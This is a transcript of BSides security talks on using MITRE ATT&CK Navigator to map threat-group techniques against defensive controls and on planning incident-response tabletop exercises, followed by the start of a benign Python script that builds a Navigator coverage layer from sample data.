and they're all labeled for you too right so again now you're using a Common Language between all the people that you deal with that everyone can understand exactly what you're talking about you're not making this up right it's a standard language for the community and so now we've got apt-33 the tactic is credential access they're using Mimi cats that's the software and the technique is actually dumping the um you know LSA secrets from the Microsoft operating system um and so it's accessing the registry and dumping those keys down and then obviously you're going to look to crack those credentials to gain access to the systems so here's a little uh demo of uh miter attack so let me just fast forward it

here this is my new intro on my YouTube channel right you like it no it's got some scary kind of music at the beginning but anyways I'll get feedback later um well no laughter hopefully the launch was okay but uh but anyway so this is miter attack this is the website um you've got your matrixies on the side that's Enterprise Windows Mac OS Linux Cloud Network Etc you've got mobile and ICS and then on this side you can see an example of the Matrix and the tactics and techniques that would be Associated to that specific Matrix and each one's different because they're different use cases right there's different tactics and techniques that the adversary is

going to Leverage now if we wanted to focus in on Enterprise all we do is go to tactics and look at Enterprise and we can see the 14 tactics that are called out specifically and we can drill into each one of these has anybody been up to the site at all if you haven't you should book more if you're a defender or even a red team you should bookmark it because the red team is going to use it to find holes within an organization and and uh and highlight where the gaps might be and Defenders can use it to defend but now I've jumped into the tactic and then you've got your Technique it's sub technique

um here you've got a boot or log on auto start and it shows you over here on the and I'll just kind of move my mouse well the other there's the tactics so this particular technique actually has persistence and privilege escalation it could be used in both places right persistence is I get access to the system all the time and privilege escalation is gaining elevated privileges and again you scroll down it's got all the procedures the details around it uh softwares that is associated to it mitigation if there is any that'll be outlined here any detective capabilities that exist will be called out here as well and then tons of reference documents right again these

are real world scenarios we're not making this stuff so so there is uh papers that you guys can reference to get better insight into how the adversary might be going about this particular technique or uh or tactic um depending on on the level that you're looking at then you've got things like data sources mitigations groups software campaigns and each one of these you can drill into I'm just going to fast forward just a little bit here the other really cool thing is um and I'll show this in the example is that I can come in and look at my specific vertical so I can look at adversarial groups that are targeting my area that I'm defending for and so you could do

this with Finance education Etc and it gives you an outline of any software you know any group that might be targeting your specific vertical and it gives you details around it and I can build a matrix up specifically to that vertical and then focus on the adversaries that are actually coming after me versus all the commodity-based stuff all the noise right one of our biggest problems is patching systems right you get a vulnerability but you get thousands of them so which one do you prioritize right you probably want to prioritize one that's actively being exploited um and that's a popular Target before something that's got the same CVS score but much lower in regards to popularity

and and there is no active exploit but it's still ranked as 10. so this screenshot here is um showing you the miter attack Navigator tool so you can do this on on the web um or you can do this you can download it and run it on your own box so I have it running on a Cali box because that's where I do both the the red and The Blue Team side from in my analysis but you can have it localized on your box and save everything locally so you have it there but I can then take that finance and I can take all the groups associated with that and I have a nice Matrix that

shows me all the tactics and techniques that the adversary is using or the adversaries in this case and then I can look at my software or sorry my controls that I have in the environment and I can overlay to see the discrepancies between the two so this is where we get into building threat and form defense right advanced persistent defense the the threat picture how do we build this out and so here's the example right there's Navigator and you could be looking at a specific adversary campaign a vertical whatever it might be um and these are all the things that this particular adversary is going to use right um so exploit so initial access well

they're looking for X uh the exploit publicly facing uh application right replication through removable media well that might be easy if I didn't allow removable media on an asset then that eliminates that risk right um and so that's the the opportunity as Defenders is to go through this and truly understand how the adversary is going to go about compromising my environment so when we draw it out we have the ability to start right from scratch come in you type in something like Financial it gives you all the outputs um and then you could look at it from a an adversarial like d Panda so if you wanted to focus on a specific adversarial group and understand how you

defend or line up against that particular adversary then you can actually import that into Navigator see all their ttps then again like I said you can overlay that with any of the controls that you might have in the environment and I'll show you that example I've got a couple of them actually all right so build your own coverage map so this is an example of that and we're going to go right into this in in a second here but you can even throw through Navigator so I showed you in the miter attack uh tool set when you go to the website you can actually go in and put in finance and it gives you the

output and you can see that but in Navigator you can do that on uh within the tool base itself and so this is showing you that example here once you have it say downloaded on your local machine you can have it all saved localized and then you can start looking at in this case education uh because I thought it'd be relevant for today I can look at all the threat groups that are associated to education in this case there's nine fret groups that Target education then I can have my rubric score right again set some thresholds that means something within the organization itself obviously should align to uh whatever uh rubrics that we're using for risk within

the organization and then once I do that I can start looking at these in detail as much as I want I can add comments to it I could um uh you know look at the tactic and technique if I'm not really familiar about how the adversary goes about it I need a little bit of Education I can do that all from this page I don't need to go back to to the main miter attack page and do that I can pivot right from here and get access to that data as needed so here's I've got three demos uh one is looking at a specific threat um so this is a specific threat that you can use any vendor it's not uh specific

to a Cisco or anybody else if they have any mapping you'll be able to pull that data into Navigator and so you can see here this does a good job of letting you know about the registry keys the file hashes all the indications to compromise or some other details here really doesn't matter because all I want to know about is the ttps this particular threat not necessarily an adversary because an adversary many adversaries may be leveraging this but I want to know the ttps for this particular threat and so I can see here they've got persistence privileged escalation all of that's available to to me now in regards to the adversary's ability now if I import that using something

like Json I import it into Navigator I now see that right and so I've you know give it a name I've given it a score of one um and it'll show that in a second I can also pivot into each one of these um and uh but very clearly I know that they use persistence for both uh a persistent and privileged escalation over here um I can see that it's used at twofold right it's used for persistence and privilege escalation so again if I can monitor that key maybe I can't stop it maybe I can but if I monitor at least I know if there's any changes to the organization right or at least that

asset I should say now if I have an endpoint product this is an example if I bring that endpoint products capabilities in and again there's different thresholds here green means that there's a lot more of that capability there's a lot of nuance in this right of how that control might be met and so um for example red might be uh I've got more coverage green would be less coverage of that particular tactic and technique um and so now I know where my my endpoint capabilities are so that's pretty easy right now I've got a good understanding of my controls in my environment and I've got a good understanding of the ransomware or that specific threat

now would I have the ability to do let me just fast forward is is take this again do some research about each one of these if I need to so this is showing you we're jumping into that boot or log on auto start the registry keys startup folder how they're leveraging this for both persistence and privilege escalation again any mitigating capabilities I can start implementing anything I can do to detect changes to that I'm going to flag or try to implement within the organization if I haven't already but more importantly what I want to do is create a third layer here right and this I think is where the beauty comes in now I'm able to take

um both a which is the threat B which is my controls and create C right which is a combination just highlight that where the gaps may still exist so basically what I'm saying is take a and b and then anything that's uh not here so what I'm going to do is actually write a very simple expression right a and not in B right then highlight it we'll go ahead there's some other things that you can set like coloring gradient links metadata you can add all of that and I show that in the video as you walk through it and now I can see this right I can see that I have defensive capabilities in majority of the

adversary's ability but there is some areas of opportunity for me as a Defender this is what I mean by leveling up the game this isn't an IP this is not a hash this is not a domain that's stuff you're already doing right and most likely that's already being fed through some auto-generated tool right outside of the research that you might do that discover that you uncover maybe an IP or domain or or hash but most of it's going to be done through a programmatic feed of some sort and and so here I've got a couple of opportunities communication through removable media as I mentioned earlier if I now have a capability to say maybe even as simple as using Group Policy

objects to to uh mitigate uh the access to um USB keys right you can't enter it maybe it's as simple as that or I have a software-based tool that says if you plug in a USB key and it's storage you can't access that device but that's now I'm elevating or I might be you know what that risk is so low of having something come in through removable media yeah I accept that risk and I have other controls elsewhere within the organization to mitigate that all right so this one here is apt-33 so I'm gonna I'm gonna go a little bit faster here because I'm sure you don't want to see um kind of the the two examples I'll

show you the output here but but basically I can come in here and grab EPT 33 so if for whatever reason there's a new campaign you know a a threat that's released out and saying look at apt is doing X Y and Z we saw that a lot with Ukraine when the war started right there was certain adversaries that you're going to look for um and then you're going to start building your defensive capabilities this is one way of coming in and saying okay apt-33 is on the prowl there's stuff that they're doing I want to learn a little bit more about them this is a good way of doing that and then I could

import that into Navigator right once I import it into Navigator I now have their capabilities outlined here you can see them here right this so this is APD you can give it whatever name you want exploitation for client X you know execution exploitation for privilege escalation valid accounts Network sniffing like these are some of the things that you can do so think about Network sniffing you know there might be things that you can do to minimize or alert you uh that that activity might be happening in the environment it's not a control right that's not the only thing that you're going to do here detection and response capabilities could be as important if not more important than the

ability to prevent right no matter how many tools you have how many vendors you deal with you're never going to prevent 100 of everything a hundred percent of the time so the ability to detect and understand a threat and then ultimately respond and reduce the overall attack surface is going to be critical right reduce that blast radius oh did I just uh I jumped too quick sorry and then we're going to create another tab in this case I'm going to pull in another a bunch of capabilities maybe I've collected so I've taken all my tool sets as an example and I've went in and I've created a matrix for all of my tools and you've probably

what happened there uh just a second sorry

that jumped and then so what's going to happen here is um hopefully you've got a lot of this coverage right when you take your entire stack of keep and they'll just take some work right you're probably gonna have to reach out to your vendors and get them to kind of break down there's Nuance in this too right so they might say that they have a capability to detect a TTP right but not the ability to control or mitigate right so there's going to be some Nuance here and that's where the color coding may come in but let's say you go through and you've done that analysis you've grabbed all your tool sets and you've shown your

coverage how many people have done this I've went through this exercise see very little and it's unfortunate right and again it's because we're so busy doing the commodity based stuff it's hard to make time to do this it's like you know a lot of times if you're building an infrastructure you're going through and you're building out that infrastructure you get it built you could have programmed it which may have taken another week and then replicate it forever but because it takes an extra week you do it the other way right and every single time you have to recreate it same thing here if you put in the work it does take some work but it'll

save you a ton of time later and also increase your overall defensive capability and knowledge in regards to how you're defended so you can see there's pretty wide coverage here you can almost see every single tactic remember tactics are at the top has coverage and then technique again has some coverage and then there's sub techniques depending on the technique itself okay so I've got that if I now do a versus B and I look at my Gap in fact in this case I don't have any now again there's Nuance into this right but this might be enough to understand that you know what we've got a lot of good coverage for this particular adversary that we don't

need to focus on this right we've got enough defensive and alerting capabilities in play let's move on and focus on something else of value to the business not focus on trying to add something that's not going to add a whole lot of value to the organization like maybe even if something like removable disk like or media was the one thing that you didn't have coverage on that could be an acceptable risk right so it's time to move on all right so last but not least at least in miter is um this one's just showing in education so let me just um jump back in here oh boy here we go you guys see that too

yeah yeah so this is this is Windows um no no windows is good it's not today but uh but anyways um we'll see what happens here but um this is taking uh this one's looking at it from a vertical perspective but the same thing applies here now you look at education you add all the threat groups software anything that you want that might be targeting education you create your your analysis right so your Matrix now you know all the tactics and techniques the adversaries because adversaries this time not just one is going to leverage um in order to um compromise the environment and then you're going to take your controls right your your detect prevent and response

capabilities you're gonna overlay it and look for the gaps that you might have in the organization and then you're going to build that out and you could save this I show you where you can save out the Matrix when when you do that the the when you put the two layers on top of each other you can save that Matrix out and put it in your risk analysis report right you can build it out and say look we've investigated these are the adversaries that Target education these are the tactics and techniques that they leverage and here's a nice screenshot of what that looks like at least for the internal teams I have a feeling if I

pull this out um it might come back that's not good any questions or comments up to now because we need you know I need a like a few minutes here anybody oh do we have to do the mic thing yeah are there any uh questions we'll insert a Scotty Star Trek joke about pushing it too hard captain foreign yeah it's uh it's frozen so we have about five minutes we can certainly address any questions or you just wanted to finish off your presentation in the dark

if you have this fully um the full session so um maybe that's what I'll do I'll share it with uh with b-sides the full the full version so the next stage of this is adversarial emulation so the ability to act as the adversary itself and I've got a demo here where we use anybody know Caldera there's a bunch of adversarial tools out there right um but anyways I I leveraged Caldera where then now we can look at the ttps the adversary might do so we can create a campaign specifically something that we want to test within our organization to see how our defensive capabilities align to the adversary's ability and so I walk through that where we actually

use CALDERA; we send out an agent to a couple of boxes. I actually have this all built with Terraform; it's all automatic, right? I took the time to do it up front, did all the programming, and now I just go, go, go, and I can recreate the environment at any time. But the point is that now I can run those campaigns against my defensive tools and understand how the adversary is doing certain elements, and then analyze those and either mitigate those risks that I identify, or have confidence that I have mitigating controls in place, or detective capabilities to let me know something's happening within the organization. So to me this is where

you start really leveling up, because now you're not only leveling up from a defensive perspective, focusing on TTPs (not ignoring the other stuff, but focusing on TTPs as well), you're really honing your skills of understanding how the adversary operates. I always believe that great defenders really understand the adversary side of it, because if you can think like the adversary, then you can put your feet in their shoes and look at the opportunities within your environment. CALDERA allows you to do that, right? It allows you to create those campaigns and run those attacks against your environment, and they could be very, very sophisticated. Like, I'm talking about, you

know, 100 different types of activities that might be taking place that you can actually build out. Hit go, it'll go out and do that, it'll call back to the C&C server. And even if you have this in a lab environment, which you probably want to, right? This is going to be a restricted area in your environment that you're testing in, because it is adversarial. But then you can say, well, wait a minute, the C&C server was IP X, and then you can go in and change the IP right in your controls and then try the attack again. That's very trivial, right? That's that low, commodity-based stuff. But the tactic or technique: if they need to

write to the registry and you remove that ability, or they need to sudo to get root access and you don't allow that individual to ever do that, then they're never, ever going to gain that credential and move forward. So that's kind of the advanced persistent defense capability that I'm thinking of and trying to educate us as defenders about: that yes, there's a lot of great stuff we do, but there's a ton of opportunity for us to make it very, very difficult for the adversary. And it's still awesome. Well, thank you, Jason. No, it's a race. Thanks. So we do have time for one quick question, if anybody's got any questions,

or if there's a computer expert who knows how to kick it. Oh no, don't go to that guy at the back. Yeah, we need somebody to fix my machine. Sorry, was there... oh yeah, I got a question here. There's always one in every crowd, guys. Thanks, Jason. Beautiful talk, more on the research side, how you connect the dots. So my question is more on how do you commoditize this in an organization which is busy just defending, or busy just trying to, you know, keep the lights on, right? Like, this is definitely an A-game, wider framework; you get through all this and try to get it on the defender side. So just curious on how do you make

it more practical for defenders to consume it in our own organizations and make it better? Yeah, I think that's a great question. I think that's the challenge, right? It's always about keeping the lights on, but if it's always about keeping the lights on, you're never going to get to these things, right? And so you've got to make time. I mean, it's that simple: you're going to make time. It's like, you're going to pay me now or pay me later, but you're going to invest time in understanding an adversary or a threat group or threat campaign somewhere down the line. The problem is, most likely, when you have the time to do that, guess what,

you're faced with an incident, because it's actually realized within your organization. So now you're taking the time to understand what the adversary is doing and then build in the mitigating capabilities and detection, response and all that jazz, but you've been hit, you've been popped, right? Credibility starts to get hit. So it comes down to: whether you're networking, systems, storage, security, you've got to make time. That's it. You have to say that maybe there's a certain portion of the day or week that you devote to elevating the game, and maybe that's the campaign that you do internally. But you're right, everybody's faced with keeping the lights on, but everybody's been doing that forever, and

it hasn't fared well for any of us, right? And you're going to give up your time, maybe now, or you're going to give it up at Christmas like last year, right? Log4j. Oh wait, that's tomorrow. But yeah, it's a tough one; you've got to make the time. Awesome, thank you so much, Jason. Well, thank you, guys.

All right, okay, I'll introduce Adam McMath, our next speaker. So Adam is... I was actually really excited to read this, because it is one of the funnier bios and very personalized. Adam is a multi-decade infosec professional who pays annual maintenance fees on a silly quantity of security and technology certs and refuses to take himself too seriously. Adam's childhood hero is MacGyver, the original, not the reboot, and he has spent his life taking things apart while making the reassembly somebody else's problem. Adam is in his glory when situations are the messiest, applying lessons from emergency services into technology drama. With his talk entitled Practice Makes

Perfect: Testing Your Incident Responses, please welcome to the BSides stage Adam McMath.

Ladies and gentlemen, Thomas Matthews. [Applause] So I appreciate the opportunity to come hang out with you. I apologize, my voice is really trashed, because I just had the RSV thing that has been going around the schools and stuff. I swear I'm no longer contagious, or at least I hope. It was awful; I couldn't speak for like three days. It was gross. So the opportunity for me to come and hang out with you today is just a real treat for me. I love BSides. I have huge appreciation for Harvinder and the gang who are putting this on. Please find Harvinder and give them a hug, give Thomas a hug. The volunteers, thank you

all very much; you're brilliant. And I appreciate the fact that we have such talented and professional speakers as well. The folks running the CTF are doing a great job, thank you. Being participants here as well, you're awesome as well; BSides doesn't happen without the people showing up and sitting in the chairs, so thank you for doing this as well. I put this talk together because Harvinder said he didn't actually have any interest in my other topic, which was about the balance between careers and hiring managers: there's two million unfilled cyber security jobs, yet I know a lot of people who are applying for cyber security jobs and not even getting calls back.

We don't want to talk about that, apparently, because it's too many hard pills to swallow. But one of the things that has become more interesting, and for some reason why my small advance... let me try this again.

I plug in the HDMI and everything breaks. I'm not going to have to do this old school, am I?

Okay, here we go. We'll call this character Shark Boss. Shark Boss just came out of the board meeting and said, wow, we need... and T-posing for maximum observation of their superiority over you: we need a tabletop session. You are our information security specialist, you have always helped us out in a crisis, you should run a tabletop for us. And of course we come back with, heck no, I'm a technologist, or, what do you mean you want me to run a tabletop? Who's going to be there? You mean the board wants to come, or the CFO wants to come? So what do we do with that? What do we do

with that? This is something that, as a consultant, I'm getting requests on all the time, or I'm getting people coming to me personally saying, hey Adam, I just got this request from my boss that we need to start doing tabletops, what do I do? And the challenge we have in a lot of cases is, as you can see, the classic ball and socket: the handshake where one goes for the fist bump and one goes for the high five, and it's awful. We finally get a tabletop scenario together. Oh, I know, let's do ransomware from a phishing email that just locks up all of our stuff, and then we don't even know what our incident

response plan is. Our incident response team, our IT team, our infosec team looks silly in front of the executives now, and nothing good comes of that. So I recognized this problem and I thought, okay, maybe this is an opportunity: if I'm not going to tick off people by talking about the hiring problem, how about we talk about how to engage our audience inside our organizations a little better, right? We're finally getting recognized, we're finally getting the opportunity to come to the table; we have to make sure we don't blow it. This is our opportunity to be heroes, to be business enablers, as information security professionals. So one of the things I wanted to do

first as well is kind of identify the problem, asking the question: what's the problem we're trying to solve here? What is the reason for the tabletop? To appease the board isn't good enough; to appease the executives, to get our PCI compliance, isn't good enough. We have to have a problem to solve. And even if we do decide, yes, we want to play, we want to roll the dice and do the Dungeons & Dragons style tabletop, are we ready? Do we have an incident response plan? Do we know what the contents are of it? So if you go through your CISSP materials, because we all live and eat and breathe by that book, don't we? I don't know. Body of

knowledge. Some of the alternatives that are available to you, things like knowledge checks: if you're doing your CISSP exam, this could be one of the questions, what alternatives are there, what kind of crisis simulations do you have? Knowledge checks. And I actually stole this directly from a slide deck that I did with a client where we had that problem exactly: we have an incident response plan, we're not necessarily convinced that the people who are going to be using it actually know the contents. So instead of just jumping straight into the big tabletop session with all the people involved, we started quizzing the incident response team. And this is a pretty simple question, like just a

simple slide deck with simple animations: you start off with the green text, you click the mouse, the yellow text comes up. So, I guess I'll poll the audience: what are the incident handling processes from NIST 800-61r2, A, B, C or D? I personally like C. The answer is of course in white underneath, right: preparation, detection, analysis, containment, eradication, recovery, post-incident activities. Regardless, before we go in and make the dreaded ball and socket, we can arm ourselves with knowledge of the incident response plan. That's one of the big findings that comes out of tabletop sessions all the time: did anybody do the pre-reading? No. Did

anybody know that we have an incident response plan? Yes. Did anybody read it? No. This kind of forces the issue a little bit. Things like checklist tests can also be helpful; again, different than a tabletop session, but this is something that you can use in your organization too, if you have an incident response plan, to verify whether or not... like, you go through your contact list: holy crap, 25 of these people no longer work here. Well, maybe that checklist will identify for you gaps in your program. We talk about gap analysis a lot; this is something that helps you with your gap analysis. Structured walkthrough: same sort of idea as a checklist

test, but you take your incident response plan and you start running things through it. You take your scenarios of phishing email causes ransomware, or something wrong with your payment gateway, and start running through your incident response plan, providing you have one. Find gaps and opportunities to make your incident response plan better, or, as I found in some other tabletop sessions where we start looking and diving into the organization to understand what we want to be testing, sometimes we discover issues with the protections in the organization. Those are always lovely, an RKO out of nowhere. Doing our technical crisis simulation: there are platforms, if you have a SIEM, if you have a SOC, that you can get those

SOC operators... if you are a SOC operator, this stuff is fantastic, because it takes you out of the mundane everyday tickets that you are addressing, and you can add material into that SOC and that SIEM that then allows the operators to do cool things, see cool things that otherwise they're always looking for but they never get to experience. Those technical crisis simulations are phenomenal in that realm, because it makes their jobs interesting again. And you can do this as well: I talk to the dudes from CrowdStrike, and thank you to our sponsors as well, not that they're listening, but they are a big

part of BSides. Go ask them about this: I happen to be your customer, is there something you can do to help me arm my staff with technical things that are cool and are going to help me respond more effectively in a crisis? Interruption tests: this one is on your CISSP exam. I'm curious, has anyone here actually done a partial or full interruption test of any of your production systems? How did it go? Thumbs down. So in the disaster recovery world and the business continuity world, this is something that is always recommended. I don't know that you will find any IT department that will really be willing to let you take down a web part

to see how you respond. And I know very few organizations that really have a non-production system that is a close enough representation of a production system; I'm seeing some nods around the room too. So this may or may not be all that effective, but it was in the book, so I thought I'd include it too. And by popular demand, with Joe Manganiello hanging out with the kids doing Dungeons & Dragons: rolling the dice and actually going through the scenarios and letting people walk through the scenarios does have incredible value, it really does. I always simply recommend first, make sure, like the classic lawyer scenario, you know what the

answer to the question is going to be before you ask it. So now that we've gone through that: every session comes at a cost. Every tabletop session you offer comes at a cost, whether that's your planning time, whether that's the time in the tabletop session, and people are judging you. People are judging everyone all the time; my teenage kids say that to me all the time, don't judge, Dad, and what do they do the whole time? They're judging. Planning time: I had an executive come to me, I guess this was probably five years ago, and said, Adam, it's time, we're doing tabletop sessions every quarter, make it happen. My

response was, great, can you give me a quarter FTE to make that happen? Because tabletop sessions do not come out of nowhere, and the real meat of the presentation is all about that: proper prior planning prevents poor performance. If you don't plan out your sessions, whether that's your checklist tests, your structured walkthroughs, anything else, your tabletop sessions, if you don't plan them out right, they will fail, and that does not help you keep your seat at the big kids' table. Session time too: if you get the executives into your room, do yourself a favor, and I guess stress yourself out, do a calculation based on what you think their salary is. You take their salary,

you divide it by 2,000, and that's about what each of those people in the room costs per hour. If you're doing a four-hour tabletop session with eight executives in that room, you can be sitting at twenty, thirty thousand dollars an hour worth of other people's time. Make it count. And the judgment time too: you are judged for the quality of the session you're delivering. Your team members, if you were facilitating this for your team, your team members are being judged by their ability to respond. The teams that come to the table with you, whether that's the corporate lawyer or whether that's the CFO, are judging each other about how well they can interact as a

team too. So here we go, build a plan. And I'm just looking at my time; oh, I'm good, I've got lots of time. What I did, for the sake of fun and debauchery, and I'm going to see if I can do this without breaking my computer or the big screen (aren't those screens lovely?)... oh, it worked, hold on, I've got to do this, but it's going to be tricky. So missioncritical.ca, it's my personal website, it's WordPress, please don't hack me, because as I was building this page on my own website last night I found SSL problems. I'll fix them tonight, I promise. But whenever I do something like this I try

to put a little bit of material that people can go and consume and read after the fact. What I did is I put together a blank tabletop plan, and it is not the one that I use in my professional practice to actually deliver tabletops, but it's awfully similar. It's the same thing that I was using when I was in emergency services and we were leading people through, like, the-town-was-on-fire kind of disaster scenarios. It's the stuff that I've used inside of large municipalities to lead them through privacy breach scenarios, things like that. A blank tabletop report, we'll talk about that. And a couple of things here too underneath that: MITRE ATT&CK

Navigator and MITRE groups. Okay, Scott Taylor talked about the MITRE ATT&CK framework, Jason Maynard talked about the MITRE ATT&CK framework, Adam McMath talking about the MITRE ATT&CK framework, Vivek I think is up next (I don't know where you are, Vivek), I bet he'll mention the MITRE ATT&CK framework. Yet when Jason asked the question about how many people are using it in their organization in their daily lives, there weren't a whole lot of hands going up. So I'll show you a couple of things, really quick and dirty and easy, that may give you some other reasons to start using it in your organization, and to start using it for things like crisis simulations that will

help. And one of the things that I put up there as well, and I'm going to talk about that right now (and I'm just guessing because I'm looking at this very sideways): AttackIQ, and I'm not trying to astroturf, so I'm not beating up the rules of engagement for BSides. But if you're looking for some training on the MITRE ATT&CK framework, how to use the MITRE groups, how to use the MITRE ATT&CK Navigator, and there's a link to that in my little silly web page too, it's free education, it's free training, things like how to navigate the MITRE groups, how to use the MITRE ATT&CK Navigator.

It's all free. You all need CPEs for all your certs anyway, so consider it. So AttackIQ Academy, academy.attackiq.com, is a really good way to look at some of that. But the first thing I wanted to take a look through, again, proper prior planning prevents poor performance, and this is all very basic, just text on a page; you can grab the PDF yourself if you want it, if you don't, it's up to you. But a tabletop plan: so how do you plan out your tabletop session? And there's a set of things that we can do to help us really understand what we're going to deliver, how we're going to engage our audience, and it all starts

with a purpose. And I gave some hints and stuff in there too. We want this to be specific and relevant to your audience. Using Thomas as an example, he works in the finance industry. I'm just going to go over here to the MITRE ATT&CK groups (Jason would have shown you some of this too). This is very simple: it's attack.mitre.org/groups, or you go to mitre.org and you do groups, or you use Google and you say MITRE ATT&CK (and you don't have to use the ampersand if you don't want to) groups, and you'll get to this page. And right in here, Ctrl-F "finance": this will tell you what MITRE ATT&CK groups are currently attacking, or have

in recent history looked at and attacked, finance industry businesses, education, health care, all of these things. You can use this resource for free to help you figure out who could be attacking your organization, which helps you determine that purpose. That purpose: what are we trying to do? It's not just an unknown attacker that is going to just send us a phishing link. Okay, maybe they will; hopefully we have good EDR and all those things that are helping protect us from that. But to really understand the motivations of our attackers so that we can deliver that to our audience in a way that is meaningful and visceral. I'm going to go back to my plan.

So the key to your purpose is a decision point: what is the real decision that I want from my audience at the end of it? What is it I'm looking for? Do I want to pay or not pay a ransom? Are we going to design a solution by which they can't get out of it without making a pay/not-pay decision? I don't know. Switching to a different service provider: I've seen tabletop sessions set up specifically for this too, to say that we have only one path of network connectivity into our data center and we need to design a solution that says we need, at minimum... So you can design your

purpose around that. Fire Jim, or Adam, or whomever, right? There may be... I just use that flippantly and silly. I like things like using the formula audience, behavior, condition, degree; that helps you make sure that your purpose is wide enough and broad enough, but also covers all the bases, so that you know who your audience is, you know what you're trying to solve, and you know what the expected behavior is going to be. Or, you know, who, what, when, where, why, how, right? Some examples that I put on there: executives will walk through the business impacts of a successful ransomware attack that cannot be recovered from via backups during a

two-hour boardroom session. Okay, that's pretty broad; that's a classic executive one. If your audience is not executives, though, the IT staff wouldn't care about that one. So what can we do with the IT staff? Let's find out; let's go into the MITRE ATT&CK groups, what kind of things are happening in our industry. The IT team will be tested for their knowledge of the incident response plan using a competitive and fun trivia event. One of the things that I didn't put, that I didn't talk about on the slide about doing the tests, is using a Kahoot, right? Discover the demographic you're working with, and if they're

collaborative, get them working together; if they are competitive, get them competing. That's always cool and fun too, right? The online store support team will be tested on their ability to discover, analyze, contain, eradicate and recover from an advanced persistent threat injected into their payment gateway. That's something that could be very interesting to an IT team but would have no value for executives. So your purpose becomes very important, because what that leads into, the next section, is the objectives: specific, measurable, action-oriented, realistic and time-bound. This is another formula that I like to help me really identify and drill down what we're trying to deliver. And the key,

so they are statements that support your purpose and become your inputs. Again, they start at this high level; we don't want a whole lot of detail at this point. All we want is objectives: the problems that we're going to try to solve, or the questions that we're expecting our audience to answer to create discussion. The IT team are presented with a packet capture that indicates industrial process control signals that have been sent from an unexpected host; they have five minutes to analyze the information and determine if an attacker is present. Develop collateral: you can develop collateral, so you can actually, and I've done this before too, it's really cool when you've got

people of a very technical nature in a room and you hand them a piece of paper with a packet capture on it, or you say, go to this URL, or go inside your SharePoint document, open this pcap in Wireshark. Oh, you didn't bring your computer? Well, how about that. Which is where section three comes into play: the requirements. Let your audience know, set up ahead of time: doing it in a boardroom? Do we need Zoom or Teams? Do we need snacks? I need snacks; I have a fast metabolism, I need to eat all the time. But lay out those technology requirements. Again, stick your pre-reads in there. I don't need everybody to bring the body of knowledge from (ISC)², but

it would sure be lovely if they understood the pre-reads or the incident response plan. That way they can't come back at you and say, nobody told me, right? So putting those together. Safety requirements too: in a lot of organizations we have to have stuff like muster zones or things like that. Yeah, stick it in there, it's great. Which then leads to the next section of actually building the plan. Here's something I really want to touch on, and I'm hoping it can sink in too: as you go through this process, you're doing that high-level creative work, you're at your emotions, you're trying to find ways to emotionally target your audience, and once you get there you can start to

copy-paste, and there's more copy-pasting coming later on. Here is your session plan: you know now what your requirements are, you know what problem you're trying to solve, you know how you're going to guide your audience to solve that. You can start building the rest of your material, the rest of your collateral to support those objectives. Stick timing in, so that you know that, wow, we're starting at one o'clock and we're going to go through 15 minutes of facilitation stuff, then we're going to go, if this is a tabletop or something, 15... I'm sorry, two hours of session time, and all your information is there.

We're going to wind down the scenario, and then we're going to go through post-scenario review. For a lot of tabletop sessions I've hosted, I've found that there is good value in one to one: we spend an hour in tabletop time, we spend an hour in review time. Let the audience critique themselves. Bring your own questions to the table, open-ended questions: so, AJ, how do you think you guys did, right? So, Tim, what did you think about the knowledge of the incident response plan, right? Open-ended questions; let them critique themselves. That way you don't need to do it, but you know what you need to do the whole time: take an awful lot of notes.

I'll get into that in a second too. And then, really, just closing it down. Having this information set up ahead of time will aid your facilitation dramatically. I think that's the end of that one; I'll go back into other things. Oh, when you are creating your collateral, when you are creating your inputs, when you're creating all your information, this one here (Jason showed you this too): MITRE ATT&CK Navigator. And if you go through the courses on AttackIQ it'll show you how to really use this. So say we went over and we found a group. Once you click on a group, it'll also kind of give you some more underlying information about the kind of things... oh,

Dynamite Panda, that's a cool name. I've never belonged to a club that sounds as cool as Dynamite Panda. It'll tell you the techniques. Jason led you through TTPs: tools, techniques, procedures, or tactics, techniques and procedures, sorry. The kinds of software they use. You can start to dial into this; it will show you the IDs of the software, the IDs of the techniques. You could say, oh, that's T1083, and if we decide that file and directory discovery, well, that actually sounds interesting, that sounds relevant for my organization, you can come back to the MITRE ATT&CK Navigator. We're going to just, you know, simple, quick, easy, dirty, I love it, we're going to create a new layer for

Enterprise, and here's where we find out if my hotspot's still on, right? So here you're interacting directly with the MITRE ATT&CK Navigator, you're interacting directly with the MITRE ATT&CK framework, and you can build your threat profile, your threat model, down from left to right. We start with reconnaissance, we go to resource development, initial access. We can build things, especially for a technical team, that are realistic, that are relevant, that are timely, all those cool things that we want our audience to be engaged with, so that they ask us to come back, and we can use things like that. I'm just going to turn on the little thing here, just because it makes it a little easier to

see. Does anybody remember what I did the search for? I can't even see that very well, some kind of sideways here. Where's my search box? There it is: T1083. I don't know, and it'll highlight it for us; it's over here somewhere.

Why isn't it highlighting? You know, if you go through the academy.attackiq.com stuff, it'll tell you how to use it better than I can, but it's a great tool that helps us also cover our bases, because if we get to, and I've done this many times too, we come up with what sounds like a brilliant threat, a brilliant attack surface, and then we get to things like defense evasion and we discover that the organization that we're doing the tabletop test in actually has technology in place that we would not actually bypass, then we have to suspend realism in our listeners. We don't want that; we don't want any of that, that's garbage.
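Both the overlay Jason described earlier (adversary techniques with the organisation's detect, prevent and response controls layered on top to expose gaps) and the Navigator layer Adam builds here can be produced from a short script instead of by clicking through the UI, which also makes the "brilliant scenario that the existing controls would actually stop" problem visible before the session. The following is an added example, not code from either speaker, from BSides or from MITRE. The threat-group profile and the control coverage in it are constructed sample data; T1083 is the technique searched for in the talk, and the other technique IDs are real ATT&CK identifiers used only as illustration. The Navigator layer fields and version strings are assumptions to check against the Navigator release you use.

```python
"""Adversary-versus-controls overlay rendered as an ATT&CK Navigator layer.

Added example (not from the talk or from MITRE). All profile and coverage
data below is constructed; the layer format fields and version strings are
assumptions that should be checked against the Navigator release in use.
"""
import json

# Constructed sample adversary profile: technique ID -> (name, tactic).
# T1083 is the technique searched for in the talk; the rest are real
# ATT&CK IDs chosen only to give the overlay something to colour.
ADVERSARY_TECHNIQUES = {
    "T1566.001": ("Spearphishing Attachment", "initial-access"),
    "T1059.001": ("PowerShell", "execution"),
    "T1083": ("File and Directory Discovery", "discovery"),
    "T1027": ("Obfuscated Files or Information", "defense-evasion"),
    "T1486": ("Data Encrypted for Impact", "impact"),
}

# Constructed sample control coverage: technique ID -> capabilities in place.
CONTROL_COVERAGE = {
    "T1566.001": {"prevent", "detect"},
    "T1059.001": {"detect"},
    "T1027": {"prevent", "detect", "respond"},
}

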